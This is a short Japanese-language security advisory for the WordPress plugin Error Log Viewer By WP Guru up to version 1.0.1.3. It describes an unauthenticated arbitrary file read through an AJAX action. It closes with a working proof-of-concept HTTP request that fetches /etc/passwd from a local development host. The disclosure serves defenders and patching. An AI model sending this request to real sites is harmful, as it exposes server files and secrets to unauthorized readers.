
Error Log Viewer By WP Guru <= 1.0.1.3 - 認可の欠如による未認証の任意ファイル読み取り
Error Log Viewer By WP Guru <= 1.0.1.3 - 認可欠如による未認証の任意ファイル読み取り
WordPress用プラグイン Error Log Viewer By WP Guru は、1.0.1.3までの全バージョンにおいて、wp_ajax_nopriv_elvwp_log_download AJAXアクションを介した任意ファイル読み取りの脆弱性があります。これにより、未認証の攻撃者がサーバー上の任意のファイルの内容を読み取ることが可能になり、そのファイルには機密情報が含まれる可能性があります。
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd